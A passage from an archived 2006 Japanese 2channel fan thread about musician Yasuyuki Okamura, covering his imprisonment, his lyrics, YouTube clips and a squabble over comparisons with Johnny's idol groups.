見てないから何とも言えないんだけど、岡村靖幸onいいとも(4/5)の奴なんだけど…
見ようとしてクリックすると、loading...って画面に出て、
ずっと真っ暗な画面のままなんです。。

なんでだろう?でも>>314さんが見れるって事は削除された訳じゃないんだね。
誰からも返事なかったから嬉しかった、ありがとう。
明日にでもまたチャレンジしてみます!

316 :伝説の名無しさん:2006/07/24(月) 11:58:30
岡村ちゃんはNYに居た!!
http://pics.hollywood-jouhou.com/images/072106pink.jpg

317 :伝説の名無しさん:2006/07/24(月) 16:17:23
youtube見たら顔の大きさが小沢とか小山田の2倍でよかったー!\(^o^)/

318 :伝説の名無しさん:2006/07/24(月) 18:17:43
ふんふんふんふふふh

319 :伝説の名無しさん:2006/07/24(月) 18:21:48
http://www.youtube.com/watch?v=UCRBMotF74s
これって放送して大丈夫だったのかなぁ・・・

320 :伝説の名無しさん:2006/07/24(月) 18:30:36
you tubeに上がってるこの人のいろんな動画 見れば見るほど気色悪い
吐き気がする・・・

321 :伝説の名無しさん:2006/07/24(月) 19:40:54
じゃあ見なきゃ良いじゃん。テレビと違って検索でもしなきゃ目に入らないっしょ





釣られたかな

322 :伝説の名無しさん:2006/07/24(月) 23:19:03
伝説をつくれた最後のミュージシャンだぁね

323 :伝説の名無しさん:2006/07/25(火) 12:47:05
原因が覚せい剤だろうが、逮捕される前に死んどけば伝説になれたのにね
まぁ、醜くもがき続けるところが彼のいいところだから、生き延びてて良かったと思うけど

324 :伝説の名無しさん:2006/07/25(火) 15:00:41
信者レベルのファン1000人くらいで10万円くらいずつ出し合って
事務所とかレーベルとかよく分からんけどそういうの作りなよ

325 :伝説の名無しさん:2006/07/25(火) 15:13:49
やだよ勿体ねぇ

326 :伝説の名無しさん:2006/07/25(火) 15:55:38
>>323
死んだら嫌だ…岡村ちゃんの両親て2人とも健在だし、家系的に早死にしないと思う。
尾崎のとこはお母さんわりと早くなくなってるもんね。

>>324
信者レベルのファンて1000人もいるかなぁ?

327 :伝説の名無しさん:2006/07/25(火) 15:58:01
吉本に圧力かけられて即潰れるとこに10万円も出せない

328 :伝説の名無しさん:2006/07/25(火) 17:37:05
出所後は、損害賠償のため再び吉本で馬車馬の如く働かせられる

に10万賭ける

329 :伝説の名無しさん:2006/07/25(火) 17:45:41
いい曲を出してくれるなら働かされるのも悪くない

が、そうなるとまた薬やりそうだよなw

330 :伝説の名無しさん:2006/07/25(火) 23:24:24
覚せい剤なんてやらないでいいように瞑想を教えてあげてよ

331 :伝説の名無しさん:2006/07/25(火) 23:29:04
岡村ちゃんは、曲提供・アレンジ・リミックス等外仕事なら悩まないって言ってた。
しかも期日も守るし、評価もいいと思う。ので、外仕事で頑張って欲しい。

332 :伝説の名無しさん:2006/07/26(水) 00:10:11
>>328
吉本で又契約してもらえるんなら、すごいラッキーじゃない?
大手だし、宣伝もしてもらえそうだし。
本人はマイペースでやって行きたいだろうから、嫌かもしれないけど

333 :伝説の名無しさん:2006/07/26(水) 02:59:38
私的感想
この人が作曲した「SUPER GIRL」と川本真琴の「FRAGILE」は良曲に感じるのに、
それ以外の曲、特に本人が歌う曲は何というか歌詞ももちろん、リズムがめちゃくちゃで雑音にしか聞こえない。

334 :伝説の名無しさん:2006/07/26(水) 03:03:54
>>333 じゃなぜ岡村スレに?他のアーティストのファンならそれでいいじゃない。

335 :伝説の名無しさん:2006/07/26(水) 03:40:10
>>333
愛の才能がない方はお引取ください

336 :伝説の名無しさん:2006/07/26(水) 03:44:55
>333
それは君の感性。
それを信じて他のアーティストのところへ行きなさい。
ここに来てわざわざ言うことではない。

337 :伝説の名無しさん:2006/07/26(水) 16:30:02
誰だってそう思うアーティストはいるけど、ふつー、わざわざ書き込まないよね。
リズムめちゃくちゃ、と言える全く異種の感性を持つ方ですね。
基本に忠実な音楽好きなら、岡村音楽は厳しいですよ。岡村孝子と間違えたのかしらー?

338 :伝説の名無しさん:2006/07/26(水) 20:40:08
ま、存在を知ってもらえてるだけよかったじゃん

339 :伝説の名無しさん:2006/07/26(水) 21:53:35
>>333
ちみにはCHARAのレモンキャンディもお勧めする

340 :伝説の名無しさん:2006/07/26(水) 22:02:31
黒田倫弘による「ビスケットラブ」のカバーを聴いて感想を聞かせてくれ

341 :伝説の名無しさん:2006/07/27(木) 15:12:10
うーん 記憶にない
特にクセもなく

342 :伝説の名無しさん:2006/07/27(木) 15:37:26
軽蔑のイメージについて三日三晩語り明かそうぜ

343 :伝説の名無しさん:2006/07/27(木) 16:27:45
毎晩、イメージだけの〜

344 :伝説の名無しさん:2006/07/27(木) 16:51:57
>>342
是非とも語ってくれ。

真夜中のサイクリングあたりから詞のテーマが理解出来ないものが多い。

345 :伝説の名無しさん:2006/07/27(木) 17:10:28
元からだろうがw

346 :伝説の名無しさん:2006/07/27(木) 17:14:26
元って?

347 :伝説の名無しさん:2006/07/27(木) 17:21:20
確かにマヨサイ辺りから、なんか変わった気がする。

348 :伝説の名無しさん:2006/07/27(木) 19:57:06
ミイミの歌詞が理解出来ないから
深く意味は考えずに曲に乗せたら気持ちのいい語録…と思って聞いてる

349 :伝説の名無しさん:2006/07/27(木) 20:52:00
この間、カトゥーンの新曲聞いたけど、少し岡村ちゃんぽくないか?
イントロのギターの感じとか、咳込む音とか歌詞とか何となくそう思った。
ジャニ嫌いな人すまそ。参考↓

http://www.youtube.com/watch?v=pi_O7UP_bNU&search=kat%20tun%20%20signal

350 :伝説の名無しさん:2006/07/27(木) 23:37:23
お前ら本当にジャニーズ好きだな
すぐプロデュースさせようとするし

351 :伝説の名無しさん:2006/07/27(木) 23:54:48
ジャニ嫌いだけど確かにちょっと岡村ぽい気がする

352 :伝説の名無しさん:2006/07/27(木) 23:57:04
真夜中のサイクリングはまだ分かりやすくない? 
マーガリンの謎は解明されたし。

353 :伝説の名無しさん:2006/07/28(金) 01:40:58
解明って…
岡村が歌詞解説したの?

354 :伝説の名無しさん:2006/07/28(金) 02:04:31
知ったふりしろ

355 :伝説の名無しさん:2006/07/28(金) 05:52:04
ジャニーズ嫌い、乙

誰かがネタ振ると直ぐに批判する

いつもながら永遠の野党だなw

356 :伝説の名無しさん:2006/07/28(金) 08:46:55
>>352
マーガリンの謎知らない。教えて。

357 :伝説の名無しさん:2006/07/28(金) 09:28:46
岡村の公判は今度いつ?

358 :伝説の名無しさん:2006/07/28(金) 11:06:46
>>355
俺もジャニーズ嫌いだけどいつもあえてスルーしてるよ
乙だのwだのと・・・どっちが頭悪そうなのか冷静に判断してみ

359 :伝説の名無しさん:2006/07/28(金) 11:32:55
>>358
そんな、お前もかなり頭悪そうだがね

ここは2ちゃんだし。それが嫌なら消えれば?

360 :伝説の名無しさん:2006/07/28(金) 12:26:24
>>357

ある意味ほのぼのとした質問だなw
既に判決確定して、現在は塀の中のはず。

更に裁判沙汰になるようなことを最近起こした(或いは、新たに判明した)
のであれば話は別だけどね。

361 :伝説の名無しさん:2006/07/28(金) 12:35:09
>>349
カトゥーンのスレで
岡村ちゃんの動画なり歌詞なりを貼って
「カトゥーンの新曲はギターや歌詞が岡村靖幸に似てませんか?」って聞いてみれば?

362 :伝説の名無しさん:2006/07/28(金) 12:53:03
お前ら本当にジャニーズ好きだな
すぐプロデュースさせようとするし

363 :伝説の名無しさん:2006/07/28(金) 13:37:37
お前はジャニーズ嫌いだな

ジャニさんにやられた経験ありなん?

364 :伝説の名無しさん:2006/07/28(金) 13:44:57
>>363
なんでジャニーズが嫌いだと
ジャニーさんにやられた経験があることになるの?
ジャニーさんにやられた経験が無い人は皆ジャニーズが好きなの?

365 :伝説の名無しさん:2006/07/28(金) 13:57:02
靖幸もジャニさんに掘ってもらえばええねん

366 :伝説の名無しさん:2006/07/28(金) 14:00:51
>>364
誰もそんな事は書いてねぇぞ
妄想飛躍しすぎだろ

367 :伝説の名無しさん:2006/07/28(金) 14:19:55
>>363
貴方がジャニ好きなのは分かったから
ジャニが好きな人が沢山いるジャニ板へ帰ってくれないかい?
その方が仲間が沢山いて楽しいでしょ?

ネタ振りは歓迎にしても
ここはあくまで岡村について語るスレなんだから
タレントが岡村について、岡村がタレントについて語ったなら兎に角
接点がない他のタレント・ミュージシャンの話を持ち出すことは
「スレ違い」である事も自覚してほしい。

岡村ファン=>363と好きなものと全て一緒 ってわけじゃないんだよ。

368 :伝説の名無しさん:2006/07/28(金) 14:22:31
岡村ちゃんはムショの中だし、
話題もないからジャニーズのネタが出てきても仕方ないのかな?と思う。
そんな事くらいで喧嘩するなんてバカバカしいよ…マターリ行きましょ

369 :伝説の名無しさん:2006/07/28(金) 14:27:49
>>355
>>359
>>363
ジャニヲタお前は氏ね

370 :伝説の名無しさん:2006/07/28(金) 14:38:11
自分はジャニーズ好きでも嫌いでもないけど
ここのスレってジャニーズってだけでやたらと拒否反応起こす人がいるみたいだね

スレ違いって言うけど、今までも岡村ちゃんに似てるってマキシマムザ亮君って人の画像貼られたり、
他にもフミヤの動画が貼られたりしてるけど
その時は誰も何にも言わないのに、
ジャニーズの場合だと文句言うんだよね。。なんでそこまで目の敵にするんだろう

371 :伝説の名無しさん:2006/07/28(金) 14:40:27
なんで目の敵にされてまで
必死にジャニーズの話題持ち出そうとするんだろう

372 :伝説の名無しさん:2006/07/28(金) 14:42:53
>>370
はいはい。
ジャニーズの素晴らしい動画を張ってくれてありがとうね。似てる。似てる。
気が済んだら帰ってくれ。

373 :伝説の名無しさん:2006/07/28(金) 14:47:42
ジャニーズに拒絶反応してるというより
粘着なジャニヲタに拒絶反応してると思われ

374 :伝説の名無しさん:2006/07/28(金) 14:50:21
このスレに粘着なジャニヲタなんていないんじゃない?
岡村ちゃんとの共通点もないし、
岡村ファンでジャニも好きな人って今まで聞いた事ないよ

375 :伝説の名無しさん:2006/07/28(金) 14:51:48
かんべいべ かーんかんべいべ

376 :伝説の名無しさん:2006/07/28(金) 14:57:09
    / ̄ ̄ ̄ ̄\
   (  人____)
    |ミ/  ー◎-◎-)
   (6     (_ _) )   
   ノ|/ ∴ ノ  3 ノ、  <ホワッツ ゴーインオン
 /   \_____.ノ  ヽ    ホワッツ ゴーインオン
/   ,ィ -っ、        ヽ
|  / 、__ う 人  ・ ,.y  i
|    /        ̄ |  |
ヽ、__ノ          ノ  ノ
  |      x    9  /
   |   ヽ、_  _,ノ 彡イ
   |     (U)    | 
   ヽ、__ノ__ノヽ_
    ヽ ̄ ̄ノ^ | ̄ ̄ i

377 :伝説の名無しさん:2006/07/28(金) 14:57:28
>>374
ふーん

378 :伝説の名無しさん:2006/07/28(金) 14:58:57
ちょっとあんたっ、気持ちの悪いAA貼らないでよっ

379 :伝説の名無しさん:2006/07/28(金) 16:09:21
そこまで言うならアンチジャニの人、なにか面白い話題でも提供してください

380 :伝説の名無しさん:2006/07/28(金) 16:22:25
そんなに言うなら今すぐ実際ここでー

381 :伝説の名無しさん:2006/07/28(金) 16:42:50
    / ̄ ̄ ̄ ̄\
   (  人____)
    |ミ/  ー◎-◎-)
   (6     (_ _) )   
   ノ|/ ∴ ノ  3 ノ、  <ホワッツ ゴーインオン
 /   \_____.ノ  ヽ    ホワッツ ゴーインオン
/   ,ィ -っ、        ヽ
|  / 、__ う 人  ・ ,.y  i
|    /        ̄ |  |
ヽ、__ノ          ノ  ノ
  |      x    9  /
   |   ヽ、_  _,ノ 彡イ
   |     (U)    | 
   ヽ、__ノ__ノヽ_
    ヽ ̄ ̄ノ^ | ̄ ̄ i


382 :伝説の名無しさん:2006/07/28(金) 18:37:18
ちょっとあんたっ、気持ちの悪いAA貼らないでよっ


383 :伝説の名無しさん:2006/07/28(金) 18:51:33
塀の中で何の作業してるのかなー
ちゃんとやれてるだろうか。。。サボって怒られてたりしそう

79 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)